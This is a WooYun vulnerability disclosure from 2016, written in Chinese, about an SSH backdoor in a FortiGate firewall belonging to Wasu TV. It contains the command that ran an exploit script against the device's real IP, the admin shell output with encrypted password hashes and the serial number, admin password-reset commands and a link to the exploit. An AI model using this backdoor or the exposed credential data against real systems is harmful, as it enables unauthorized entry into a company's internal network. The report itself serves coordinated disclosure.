漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0171208
漏洞标题:华数TV某FortiGate防火墙存在SSH后门可vpn入内网
相关厂商:华数数字电视传媒集团有限公司
漏洞作者: bitcoin
提交时间:2016-01-20 11:00
修复时间:2016-03-05 09:52
公开时间:2016-03-05 09:52
漏洞类型:网络未授权访问
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开
简要描述:
vpn入内网
详细说明:
ip:218.108.5.6
该FortiGate防火墙存在SSH后门
查了下whois
确认是贵公司的
WHOIS Results for:218.108.5.6
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to \'218.108.0.0 - 218.109.255.255\'
inetnum: 218.108.0.0 - 218.109.255.255
netname: WASU
descr: WASU TV & Communication Holding Co.,Ltd.
descr: 6/F, Jian Gong Building, NO.20 Wen San Road, Hangzhou,
descr: Zhejiang province, P.R.China 310012
country: CN
admin-c: XZ1291-AP
tech-c: TF142-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
changed: hm-changed@apnic.net 20080123
changed: hm-changed@apnic.net 20151202
source: APNIC
root@bt:/var/www# python forti.py 218.108.5.6
BC_HZ_60C # show user group
config user group
edit "FSSO_Guest_Users"
set group-type fsso-service
next
edit "Guest-group"
set member "guest"
next
edit "admi_opt_G"
set member "admin_branch"
next
end
BC_HZ_60C # show system global
config system global
set admin-sport 8443
set fgd-alert-subscription advisory latest-threat
set gui-explicit-proxy disable
set hostname "BC_HZ_60C"
set tcp-halfopen-timer 120
set timezone 04
set two-factor-ftm-expiry 60
end
BC_HZ_60C # get system status
Version: FortiWiFi-60C v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FWF60C3G13006149
Botnet DB: 1.00000(2012-05-28 22:51)
BIOS version: 04000031
System Part-Number: P08947-06
Log hard disk: Available
Internal Switch mode: switch
Hostname: BC_HZ_60C
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 271
Release Version Information: GA Patch 6
System time: Mon Jan 18 23:40:28 2016
BC_HZ_60C # show system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set ssh-public-key3 "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1xGmeuxT0vnJ5Z+8dMW3j2MuJNApkqfQlX5Zxh75G4GpbJ6wDLD3X3S+G3Ue4AOSxtpgSF8T4c8yfY7j/HtxwwONrHfCNRz/ULs34f+9svHUIcPDdNYkrePmyOm3lKqFrTn1FJDbPlLTnC2oZTSuoX5KAx3/Y5UYbFvBosjUW7R7Duy618fZ15wrFoKoXM3LUUrI4ZZfjwgCzpZQgyWJJV4iLkC94AlICPrNlkQoEKPMMzJKfAVLv4buvNGDc3Cu5CUl0qQlEIfkXZByC0BlKC1EeNhR0VnXQldvYT/mo4y3qDFPVyPK9Ec+bDPXo/z4XxTD31eWWQq00VioEngzp"
config dashboard-tabs
edit 1
set name "Status"
next
edit 2
set columns 1
set name "Top Sources"
next
edit 3
set columns 1
set name "Top Destinations"
next
edit 4
set columns 1
set name "Top Applications"
next
end
config dashboard
edit 1
set tab-id 1
set column 1
next
edit 2
set widget-type licinfo
set tab-id 1
set column 1
next
edit 3
set widget-type sysres
set tab-id 1
set column 2
next
edit 42
set widget-type gui-features
set tab-id 1
set column 2
next
edit 4
set widget-type jsconsole
set tab-id 1
set column 2
next
edit 5
set widget-type alert
set tab-id 1
set column 2
set top-n 10
next
edit 21
set widget-type sessions
set tab-id 2
set column 1
set top-n 25
set sort-by msg-counts
next
edit 31
set widget-type sessions
set tab-id 3
set column 1
set top-n 25
set sort-by msg-counts
set report-by destination
next
edit 41
set widget-type sessions
set tab-id 4
set column 1
set top-n 25
set sort-by msg-counts
set report-by application
next
end
set password ENC AK1c6/7vU6fy5GXrH2O4eWJuer77FlPff9GGE8qWEXfkv4=
next
edit "admin_branch"
set accprofile "opr_admin"
set vdom "root"
config dashboard
edit 1
set widget-type gui-features
set tab-id 1
set column 2
next
end
set password ENC AK1c0b+ocn3KOdTKwaid97NzcK/1hX+4UQeED1Kgt7RjgI=
next
edit "radius"
set accprofile "super_admin"
set vdom "root"
set password ENC AK1XORarUH865C+TeuWunT/E+nseKMhhrN/M5NU/criK+w=
next
end
可任意重置管理员密码,这里不深入了!
可参考
WooYun: superalloy巧新科技FortiGate防火墻後門可登錄VPN
点到为止
config system admin
edit admin
set password ****
end
利用脚本
http://seclists.org/fulldisclosure/2016/Jan/26
漏洞证明:
BC_HZ_60C # get system status
Version: FortiWiFi-60C v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FWF60C3G13006149
Botnet DB: 1.00000(2012-05-28 22:51)
BIOS version: 04000031
System Part-Number: P08947-06
Log hard disk: Available
Internal Switch mode: switch
Hostname: BC_HZ_60C
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 271
Release Version Information: GA Patch 6
System time: Mon Jan 18 23:40:28 2016
修复方案:
升级防火墙
版权声明:转载请注明来源 bitcoin@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-01-20 14:41
厂商回复:
已确认,正在处理
最新状态:
暂无